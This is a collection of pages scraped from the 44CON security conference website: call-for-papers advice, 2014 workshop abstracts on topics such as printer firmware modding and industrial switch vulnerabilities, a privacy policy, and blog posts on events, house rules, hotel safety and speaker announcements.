          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          2 thoughts on “How to game the 44CON CFP

          Comments are closed.

          #####EOF##### 44CON 2014 Workshops – 44CON

          44CON 2014 Workshops

          Some of the following workshops have specific requirements for items that attendees should bring along, full details can be found here on the requirements page.

          Advanced Excel Hacking

          Presented By: Didier Stevens

          This is a workshop on hacking Excel on Windows without exploits.

          Visual Basic for Applications (VBA) is a powerful programming language, more powerful than VBScript, because it has access to the Windows API. What I teach in this workshop is applicable to all applications with VBA support (Word, Powerpoint, AutoCAD, …), but I choose Excel because of its prevalence and its tabular GUI that is particularly suited for inputting and outputting data.

          I illustrate 2 major hacking techniques on Excel: pure VBA and VBA mixed with with special shellcode and DLLs.


          Creating A Security Awareness Program

          Presented By: Valerie Thomas

          Creating a security awareness program from scratch is no easy task. If you’re responsible for building a new program, modifying an existing program, or just want some educational resources for friends and family this workshop is for you. We’ll cover the basic components of an awareness program, training for budgets large and small, and bringing it all together to create a program that’s right for you.


          The 100 Question InfoSec Quiz

          Presented By: Jerry Gamblin

          Do you love InfoSec? Do you like Trivia Questions? Do you like naturally ebullient Americans? If so this is the workshop for you. This will take place on the Wednesday Evening of 10th September.


          No More Neck Beards: An Introduction to abusing the Android Kernel

          Presented By: Josh Thomas

          The Android / Linux kernel seems to still remain a magical place to a lot of us in the security industry. We understand exploitation fairly well, but when it comes to simple manipulation we find ourselves lost. In this workshop, I am hoping to change that paradigm.

          We will focus on a guided exploration of some interesting and often overlooked portions of the kernel. We will analyze them, understand them, recompile them and see what happens on a real device. The primary focus will be on recreating the NandX project (hiding data on NAND Flash hardware) and Project Burner (manipulating power routing on device internals), but we will also walk through some other peculiar code that can be found hidden deep in the standard source tree.

          The direct goal of this workshop is for all attendees to walk away with a deeper understanding and familiarity of the kernel itself and the ability to recreate and extend my specific kernel research.


          Binary Protocol Analysis with CANAPE

          Presented By: James Forshaw

          CANAPE is an open source network proxy written in .NET. It has been developed to aid in the analysis and exploitation of unknown application network protocols using a similar use case to common HTTP proxies such as Burp or CAT.

          This workshop will go through the basics of analysing an unknown application protocol with hands on training examples. By the end of the workshop candidates should be able to better understand CANAPE’s functionality and be able to apply that to other protocols they come across.


          Incident Handling with CyberCPR

          Presented By: Steve Armstrong & Mike Antcliffe & Ed Tredgett

          n this workshop we will demonstrate the functionality of the new FREE Incident Response tool: Cyber Crisis Planning Room (CyberCPR) (www.crisisplanningroom.com). This new free tool has been designed to support Incident Handling. The tool has been written from the ground up by security cleared Incident Responders; so we added the sorts of features we wanted.


          Playing the 44CON CTF

          Presented By: Tim Pullen

          If you’re interested in playing the 44CON CTF, this is the workshop for you. It will focus on my experience playing (and winning) the last 2 years of 44CON CTF, and give some advice on CTFs in general.

          This will take place on the Wednesday Evening of 10th September


          Switches Get Stitches

          Presented By: Eireann Leverett & Matt Erasmus

          This 2 hour workshop will introduce you to Industrial Ethernet Switches and their vulnerabilities. These are switches used in industrial environments, like substations, factories, refineries, ports, or other other homes of industrial automation equipment. In other words, scada and ICS switches. You will gain familiarity with the basic usage of these switches, and do some very light traffic analysis and firmware reverse engineering.

          Not only will vulnerabilities be disclosed for the first time (exclusively at 44CON), but the methods of finding those vulnerabilities will be shared. If you have never done any reverse engineering or firmware analysis, this might be a good place to start.

          You will need to be familiar with a linux commandline, and the usage of tools such as BURP and wireshark. If you are an IDA Pro wizard we welcome your attendance, but we won’t be teaching you anything new. However, we will examine firmware and device embedded webservers with tools such binwalk, strings, grep, xxd, python, scapy, and compression utilities.

          All vulnerabilities taught/disclosed will be in the default configuration state of the devices. While these vulnerabilities have been responsibly disclosed to the vendors, SCADA/ICS patching in live environments tends to take 1-3 years. So this work will be fresh and useful for your penetration tests in the future.

          You might even find new vulnerabilities with the chance to play with these devices (which are being brought to 44CON for this workshop)!


          ARM Wrestling a Printer – How to Mod Firmware

          Presented By: Michael Jordon

          How secure is encrypted, embedded ARM firmware? This talk discovers how an encrypted firmware image may be hijacked to run custom malware, demonstrated using a Canon printer. This talk will explain the full process, from breaking the encryption, identifying and understanding the flash file format, reverse engineering the binaries, bootloader, compression, and ARM instructions, patching the binary, development of an ARM backdoor, reversing the functionality to steal printed documents and scanned files, and finally rebuilding the firmware to create a malicious image which may be uploaded it to the printer. The entire process is carried out from without the need for authentication, and this work can be deployed simply by being on the same LAN/WLAN as the printer, or deployed via CSRF in the case of internet connected printers. All the above takes place on an ARM device which has no a full OS, no debugger and no console. In the final demo I will show how far you really can take a printer.

          #####EOF##### DSC_2146 – 44CON

          DSC_2146

          #####EOF##### 44CON Privacy Policy – 44CON

          44CON Privacy Policy

          This is a very boring document, but don’t let it put you off.

          TL:DR – We consider your privacy rights to be human rights wherever in the world you live. We take steps to secure the information we collect, and only use or share it under specific circumstances. If you ever want to talk to us about it, or request we do something with data held about you, just talk to us and we’ll do our best. If you have any questions, please contact dpo@44con.com.

          Sense/Net Ltd (“44CON”) Privacy Policy

          We consider privacy rights to be fundamental human rights. Regardless of where you live, you have the right:

          • to access your information and to receive information about its use.
          • to have your information corrected and/or completed.
          • to have your information deleted.
          • to restrict the use of your information.
          • to receive your information in a portable format.
          • to object to the use of your information.
          • to withdraw your consent to the use of your information.
          • to complain to a supervisory authority.

          When exercising these rights, there may be consequences affecting our ability to deliver access to the event. We’ll try to warn you of this at the time, but will carry out your request if you confirm you wish to proceed after being warned.

          Data Protection Officer: Marizel Fourie

          To exercise or query your information rights, please contact our Data Protection Officer at dpo@44con.com.

          Data collected

          We collect the following pieces of information:

          • We use cookies on websites for analytics, marketing and support.
          • Name, Contact information, IP address, cookie information, device information, geographical information from IP address and time of access through web and host analytics and logs.
          • Email address and any information (for example, food preferences) you provide when buying a ticket or contacting us via email.
          • Country of origin, Email address, name and any information you provide when using our CFP system.

          Your information is shared with the following third-parties:

          • Companies sharing directors with Sense/Net Ltd (Currently Alien8 Systems Ltd, Cortex Insight Ltd, Mandalorian Security Services Ltd and Raw Hex Ltd). Sense/Net Ltd doesn’t employ anyone. Instead, people employed by these companies support Sense/Net’s operations. The information is shared in order to support events such as 44CON.
          • Eventbrite (for ticketing), Google (mail, groupware and analytics), Hootsuite (Social media), Mailchimp (44con-announce list), Slack (internal chat), Shopify (Ticket and swag sales), Youtube and Vimeo (Talk and Workshop videos), Sched (Scheduling – speaker details), SagePay (for payment processing).
          • We also use other platforms such as Sched for scheduling, YouTube and Vimeo for video but your information is not provided by us, unless you’re the subject of the content (e.g. a speaker).
          • Volunteers working on events (e.g. our CFP panel and where relevant, ops leads). This is provided on a need-to-know basis and strictly for the purposes of making events run smoothly. Data is shared with volunteers on an individual, not company basis.

          Your information is not shared by us:

          • With sponsors, friends of 44CON or partners except as shown above or where specific explicit consent is granted (e.g. you asked a crew member to pass your email address to a sponsor).

          On consent

          When you send us information, you are deemed to have given us the consent to process it in accordance with our policy and the laws of England and Wales.

          You may withdraw consent by emailing our DPO in the first instance, or using function-specific features such as the unsubscribe button in every 44CON-announce list email, or their equivalents.

          Use of collected data

          How we use your information:

          • Administrative and business purposes, including but not limited to processing orders and refunds, travel bookings, contacting you with information about the event or those connected to it.
          • In order to meet contractual obligations.
          • Improving our systems and marketing through the use of analytics.
          • Advertising goods and services.
          • To fulfil legal obligations under the laws of England and Wales.

          How long we retain it for (in order of importance from most to least):

          • As long as we need it in order to comply with the laws of England and Wales (e.g. for tax purposes).
          • As long as we need it in order to perform the functions above.
          • As long as consent is not withdrawn (e.g. our announce list).

          How we secure your information:

          • We use Google’s G Suite to store the majority of our data used for operating the event, which allows us (amongst other things) to track who downloaded copies of it.
          • We use appropriate encryption methods (TLS, PGP, drive crypto) to protect personal data at endpoints and in transit.
          • We try to avoid collecting information where practical.

          Transfers of information outside of the EU:

          As an international event, some of our volunteers are based in and outside of the EU. Where we transfer information outside the EU, we’ll ensure appropriate safeguards are in place, for example our non-EU suppliers such as Google have self-certified as compliant with the EU-US privacy shield.

          Sensitive Personal Information

          We do not knowingly or intentionally collect what is commonly referred to as “sensitive personal information”. Please do not submit sensitive personal information about you to us.

          #####EOF##### stevelord – Page 2 – 44CON

          44CON Training Goes Quarterly

          We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused course on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

          That’s right, you no longer have to wait a year to sit a high quality training course!

          Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

          Mastering Container Security – Rory McCune, NCC Group
          Malware Reverse Engineering – Joxean Koret

          Both courses are two-days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

          If you’d like to offer a high-end course in London, get in touch.

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

          Screen Shot 2018-08-29 at 20.37.05

          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

          Screen Shot 2018-08-30 at 11.24.12

          Screen Shot 2018-08-30 at 11.14.03Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

          Screen Shot 2018-08-29 at 20.37.41

          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

           

           

          Screen Shot 2018-08-29 at 20.38.33

          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

          What To Expect On Thursday Night

          44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

          If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

          HackerOne_black_1

          First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complementary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of Alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

          The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

          Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

          Looking for something more blue team than red? From 20:00, Phillipe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

          While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

          • Best billed idea
          • Most lame duck pitch
          • Most quackers concept

          Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

          If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

          Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature either in part or in hole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

          On Hotel Accommodation And Safety

          First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

          +44 (0)7955 376 729

          Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

          While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

          To that end, we’ve done two things:

          1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
          2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

          In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

          We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

          If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

          The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

          The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this twitter thread:

          “I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

          Once again, that emergency crew number is:

          +44 (0)7955 376 729

          If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

          Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

          1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
          2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
          3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
          4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
          5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

          We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

           

          Introducing 44CON’s House Rules

          44CON was born out of a private event that Adrian and I used to occasionally get involved in organising. It was a close-knit group of people featuring deeply opinionated and often spectacularly drunk people who somehow mostly got along.

          As 44CON grew, more people outside that group attended. The new people didn’t know about our overton window. These people paid good money for a good time, but were new to our community and we hadn’t provided guidance on what was acceptable behaviour, or how we handle concerns.

          An event with talks about exploiting human and computer trust relationships tends towards some attendees holding unusual views about acceptable behaviour. To make things easier for everyone, we introduced Wheaton’s Law. For those that don’t know, it’s fairly easy to take on board:

          “Don’t be a dick.”

          For a long time “Don’t be a dick” was the only rule we had. Every year we’d review it, and every year it would stay.

          We have had people breach the rule. We’ve had and investigated complaints. We stand by Wheaton’s law as it’s stood by us. What we haven’t done is properly track complaint resolution, and we hadn’t told people how to raise concerns. That’s why we’ve launched our House Rules. They’re not going to be perfect, but it’s a start.

          The House Rules are simply an expansion of Wheaton’s Law. They set expectations, a reporting process and circumstances under which we’ll eject someone, along with a reminder that the laws of England and Wales may not match your own at home.

          We’ve integrated feedback from event organisers up and down the country, and we’re fully open to suggestions on how to improve them for next year. To be clear, there’s no change in our expectations from previous years, only in how we communicate them.

          If you’re coming to 44CON you’ll see the house rules in your brochure or you can read them now. Please take a moment to read them, as they apply to everyone. If you have any questions, suggestions or comments, use the email address on the House rules page before the event, or follow the procedure to report a concern once you’re there.

          We want everyone to have a good time, regardless of preferred text editor, open source licensing beliefs or i/o port configuration. We hope you’ll join us and keep making 44CON a great place for everyone.

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          #####EOF##### DSC_4866-1 – 44CON

          DSC_4866-1

          #####EOF##### 44CON 2016 – 44CON

          44CON 2016 – Another year done!

          Well that’s it for another year, our sixth 44CON has come to an end!

          We here at 44CON would like to take the opportunity to thank all of our sponsors, speakers, attendees and crew for making this year’s 44CON the most mellow yet. If you didn’t manage to catch all of the talks the slides should be available soon so make sure you keep a look out for them. You can also still pre-order access to the videos in our shop.

          We know many of you are fans of good coffee so Antipode sent us over some stats:

          • 13kgs Espresso
          • 24 litres Cold Brew!!!
          • 12 litres filter coffee
          • 40 litres of milk.

          Don’t forget to mark your diaries for next year, 44CON 2017 will be taking place on the 13th-15th September. We hope to see many of you there.

          Getting Started With Your HIDIOT Badge

          Warning: Unlike most software, hardware can permanently damage machines. While every effort has been made to ensure that the 44CON badge will not kill your computer, remember that you built it yourself. Consider using a USB Hub when connecting the HIDIOT. Electrical faults are more likely to kill the hub than your computer. 44CON and Sense/Net Ltd accept no responsibility, both in general and specifically to the use and abuse of your HIDIOT and any damage caused therein.

          Thanks to Akos Rajtmar for the HIDIOT assembly video above

          If you came to 44CON 2016, then congratulations, you are one of about 500 people who have a HIDIOT 0.7 board.

          If you took part in the badge soldering workshop, then congratulations, you are one of <150 people who have a fully functioning HIDIOT 0.7 board.

          But what is a HIDIOT 0.7? And how do you make it do something other than blink? Continue reading “Getting Started With Your HIDIOT Badge”

          What to expect at 44CON

          If you haven’t been to 44CON before then you are in for a treat! We have 2 and a half jam packed days of awesome talks, workshops & networking… don’t believe us?… see for yourself. Oh, and yes, the big red bus is back this year with the bar being sponsored by Amazon! So make sure you stop by to say hello and grab a drink.

          44CON kicks off with a FREE community evening tomorrow night, from 6:30pm (Wednesday 14th, registration from 6pm). If you can’t make it to the full event but still want to be part of 44CON, the community evening is the perfect opportunity. If you have purchased your ticket for 44CON, it includes entry to Wednesday evening, all you need to do is turn up. If you can only attend the Wednesday evening then you will need to register here.

          Following on from our community night we have two full days of talks and workshops including Pen Test Partners IOT Workshop presented by Ken Munro (psst they will have beer!):

          Live car hacking – come and have a go at the Mitsubishi Outlander and see if you can find new vulnerabilities with their guidance. IoT hacking tuition is hands on – they will have a large quantity of IoT devices, testing equipment and a number of their team there to help you with extracting firmware.

          This year’s list of IoT junk stuff includes:

          • Various smart thermostats, some of which have 0-days, others are untested
          • Even more smart talking toys, just waiting to be made sweary
          • More home webcams than you can shake a stick at, ready to leak creds
          • And more wi-fi kettles, ovens and coffee machines…

          Ken is a regular speaker at the ISSA Dragon’s Den, (ISC)2 Chapter events and CREST events, where he sits on the board. He’s also an Executive Member of the Internet of Things Security Forum and spoke out on IoT security design flaws at the forum’s inaugural event. He’s also not averse to getting deeply techie either, regularly participating in hacking challenges and demos at Black Hat, 44CON, DefCon and Bsides amongst others.

          Ken and his team at Pen Test Partners have hacked everything from keyless cars and a range of IoT devices, from wearable tech to children’s toys and smart home control systems. This has gained him notoriety among the national press, leading to regular appearances on BBC TV and BBC News online as well as the broadsheet press. He’s also a regular contributor to industry magazines, penning articles for the legal, security, insurance, oil and gas, and manufacturing press.

          Read Ken’s blog here.

          Tickets are expected to sell out, so get yours while you can.

          See you at the ILEC!

          Jerry Gamblin: Frictionless Security

          Over the last few weeks we have been announcing the line up for 44CON2016. 44CON kicks off this week but it’s not too late to get your tickets!

          Our final speaker announcement is Jerry Gamblin – Frictionless Security

          “Frictionless Security” is the process of building your security program into your company’s infrastructure stack so that it is automated, non-intrusive, and non-negotiable.  Over the last year as I have implemented this program I have written custom API calls, CHEF scripts, slack bots and more in order to make my security program as frictionless as possible.

          In this talk we will discuss:

          What went well.
          What went wrong. (Hint: A LOT)
          What we will do differently to improve.

          Jerry Gamblin’s passion for security was ignited in 1989 when he hacked Oregon Trail to give himself the highest score in history in the world on his 3rd grade teacher’s Apple IIe.

          As a (mostly) grown up security evangelist and analyst, he has been featured on numerous blogs, podcasts and has spoken at security conferences around the world on keeping companies secure.

          When he’s not helping companies be more secure, you can find him taking his son to swim lessons or learning how to solder.

          You can read his latest thoughts at jerrygamblin.com.

           

           

          Evan Booth: Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Evan Booth – Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker

          In May of 2015, it was estimated that a pod-based coffee maker could be found in nearly one in three American homes. Despite the continued popularity of these single-cup coffee conjurers at home as well as in the workplace, it has become clear that these devices are not impervious to mechanical and/or electrical failure. It was this intersection of extremely prevalent hardware and relatively short lifespan that prompted me to begin exploring the upper limits of what could be created by repurposing one of the most popular pod-based machines: the Keurig.

          In this session, we will walk through some real-world examples of “MacGyver”-style creative problem-solving, we’ll go hands on (yes, pun intended) with stuff made from repurposed Keurigs, and finally, I’ll reflect on lessons learned from looking for potential in things most people deem common and unremarkable.

          Evan Booth loves to build stuff out of other stuff. As an engineer for Skookum, a full service software development company in Charlotte, North Carolina, he works to solve a variety of business problems through the creative use of technology. As a human for Earth, he tends to break things for curiosity’s sake.

          Throughout 2013 and into 2014, in an effort to highlight hypocrisy and “security theater” brought about by the TSA, through a research project called “Terminal Cornucopia,” Evan created an arsenal ranging from simple, melee weapons to reloadable firearms to remotely-triggered incendiary suitcases—all solely comprised of items that anyone can purchase inside most airport terminals *after* the security checkpoint.

          Given the right ingredients, a big cardboard box can be a time machine, spaceship, minecart, or a telephone booth that only calls people named “Steve” who live in the future.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Ian Trump: Meaningful Measurement: It’s About Time We Got This Right

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Ian Trump – Meaningful Measurement: It’s About Time We Got This Right

          That cyber-crime has driven the rise of malware during the last decade is not in doubt; how large that increase has been most certainly is. This measurement has, I would argue, been more speculative than evidential. The problem being that attempts to quantify malware usage are lacking any meaningful industry accepted standard when it comes to the metrics concerned.

